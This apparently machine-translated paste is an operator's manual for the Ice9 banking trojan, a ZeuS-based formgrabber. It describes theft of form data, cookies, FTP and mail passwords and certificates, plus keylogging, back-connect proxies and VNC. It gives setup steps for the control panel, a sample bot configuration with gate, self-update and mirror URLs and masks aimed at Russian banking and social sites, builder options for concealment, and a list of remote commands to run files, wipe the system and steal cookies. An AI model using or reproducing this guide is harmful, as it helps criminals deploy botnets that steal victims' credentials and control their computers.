ICE9 TUTORIAL


SUBMITTED BY: Guest

DATE: Oct. 29, 2013, 4:23 p.m.

FORMAT: Text only

SIZE: 6.7 kB

HITS: 1033

  1. ================================================== ==================
  2. BRIEF DESCRIPTION OF THE
  3. ================================================== ==================
  4. Ice9 new bot formgrabber like ZeuS.
  5. Was based on second line version of ZeuS and was redesigned and improved quality.
  6. The main task was to increase relative to its progenitor otstuka and the task was successfully accomplished.
  7. Improved round proactive protection and firewalls.
  8. The same treatment was subjected to injection technology allows injection produce work much more stable.
  9. Boat is constantly evolving and updated.
  10. ================================================== ==================
  11. FUNCTIONAL
  12. ================================================== ==================
  13. Keylogging
  14. -Grabbing http and https form data, and inject its code into Internet Explorer and browsers on its engine (AOL, Maxton, etc.), Mozilla FireFox
  15. -Grabbing cookies. Sol files and saved form data
  16. -Grabing-FTP clients: FlashFXP, Total Commander, WsFTP 12, FileZilla 3, FAR Manager 1,2, WinSCP 4.2, FTP Commander, CoreFTP, SmartFTP
  17. -Grabbing Windows Mail, Live Mail, outlook
  18. -Socks-with the possibility of backconnect
  19. Screenshots in real time as well as the ability to set response when viewing a particular URL
  20. -Obtain certificates from the repository "MY" (certificates marked "Do not exportable" is not exported correctly), and its treatment.
  21. After that, any imported certificate will be stored on the server.
  22. -Sniffer for TCP traffic
  23. -Wide range of commands to control the infected PCs
  24. -VNC module
  25. ================================================== ==================
  26. PROCEDURE
  27. ================================================== ==================
  28. The installation procedure consists of 2 parts:
  29. a) To install the server part (control panel, bot)
  30. b) the configuration of the bot
  31. -Installing the server side:
  32. Fill the folder with the server to the server and set the directory system CHMOD 777
  33. Create a MySQL database
  34. Run the script install / index.php in the folder with the server to the server-drenched and follow the online instructions
  35. Note: need to have the php module mb_strings
  36. -Configuration procedure bot:
  37. Boat has a configuration file settings.txt where all the necessary settings for it to work.
  38. The settings file is divided into several sections: Settings (basic settings)
  39. {"Settings"
  40. ; Path to self-bot (bot download this EXE if newer config version was created and trying to self-update)
  41. autoupdate_path "http://localhost/bot.exe"
  42. ; Gate Way to the admin (the path through which the bot passes the information to the Control Panel)
  43. receiving_script_path "http://localhost/script.php"
  44. ; File name with injects
  45. injects_file "injects.txt"
  46. ; Data filters grabbing (the format is fully compatible with the format of Zeus)
  47. {"DataGrabFilters"
  48. ; "Http://mail.rambler.ru/ *" "passw; login"
  49. }
  50. ; Fake hidden URI redirect (format is fully compatible with the format of Zeus)
  51. {"URLRedirects"
  52. ; "Http://www.rambler.ru" "http://www.yandex.ru" "GP" "" ""
  53. }
  54. ; Ways to backup config files (in case of unavailability of the main config the bot will attempt to download and use the backup configuration file)
  55. {"MirrorServers"
  56. "Http://advdomain/cfg1.bin"
  57. }
  58. ; URI mask
  59. {"URLMasks"
  60. "Nhttp: / / * odnoklassniki.ru / *"
  61. "Nhttp: / / vkontakte.ru / *"
  62. "S * / login.osmp.ru / *"
  63. "S * / atl.osmp.ru / *"
  64. }
  65. }
  66. The list of available masks URI:
  67. N - do not write data in reports
  68. S - make screenshot with mouse clicks on the page area matches the URI of the mask
  69. C - the preservation of all cookies associated with that URI and blocking access to it
  70. B - blocking access to the URI
  71. ================================================== ==================
  72. DESCRIPTION OF WORK Builder
  73. ================================================== ==================
  74. - Creating a bot: (not available for tethered to the host version)
  75. Setting's path - the path to the configuration file
  76. Botnet's name - the name of a botnet
  77. Settings retrieve timeout - intrerval between bot download settings from the server
  78. Statistics retrieve timeout - intrerval between the sending of reports to the server
  79. RC4 encryption key - the encryption key (must match the key in the admin)
  80. Remove certificate - Remove certificates when establishing a bot
  81. Disable TCP - disable TCP-server (socks server, the screenshots in real time) - increases the concealment
  82. - Create a configuration file:
  83. RC4 encryption key - the encryption key (must match the key in the admin)
  84. Settings file - the path to configuration file
  85. - Find and remove the bot from the system:
  86. Enter the RC4 encryption key at the bottom of the window.
  87. If your system features a bot with the same key is the delete button will be available.
  88. ================================================== ==================
  89. A list of commands the bot (team prescribed in section admin scripts)
  90. ================================================== ==================
  91. Working with the OS.
  92. os_shutdown - Shut down the computer
  93. os_reboot - Reboot the computer
  94. Working with a bot.
  95. bot_uninstall - Unload boat from the computer
  96. bot_update [url] - Scan bot
  97. bot_update_exe [url] - Update the bot
  98. bot_bc_add [service] [ip] [port] - Create a back-Connect connection with the bot
  99. bot_bc_remove [service] [ip] [port] - Remove back-soednenie connection with the bot
  100. bot_httpinject_disable [url_mask] - Turn off injection produce a bot
  101. bot_httpinject_enable [url_mask] - Add a performance injection produce a bot
  102. Working with the user.
  103. user_destroy - Kill Operatio System of bot
  104. user_logoff - Terminate a user session bot
  105. user_execute [url] - Run the executable file on your computer, this command has updated the bot exe
  106. user_cookies_get - Get a cookie from your computer bot
  107. user_cookies_remove - Remove the cookies from your computer bot
  108. user_certs_get - Get a certificate from a computer bot
  109. user_certs_remove - Delete certificate from a computer bot
  110. user_url_block [url_mask] - Block URL
  111. user_url_unblock [url_mask] - Unblock URL
  112. user_homepage_set [url] - Set the URL as a homepage bot
  113. user_flashplayer_get - Get SOL files from a computer bot
  114. user_flashplayer_remove - SOL Delete files from computer bot

comments powered by Disqus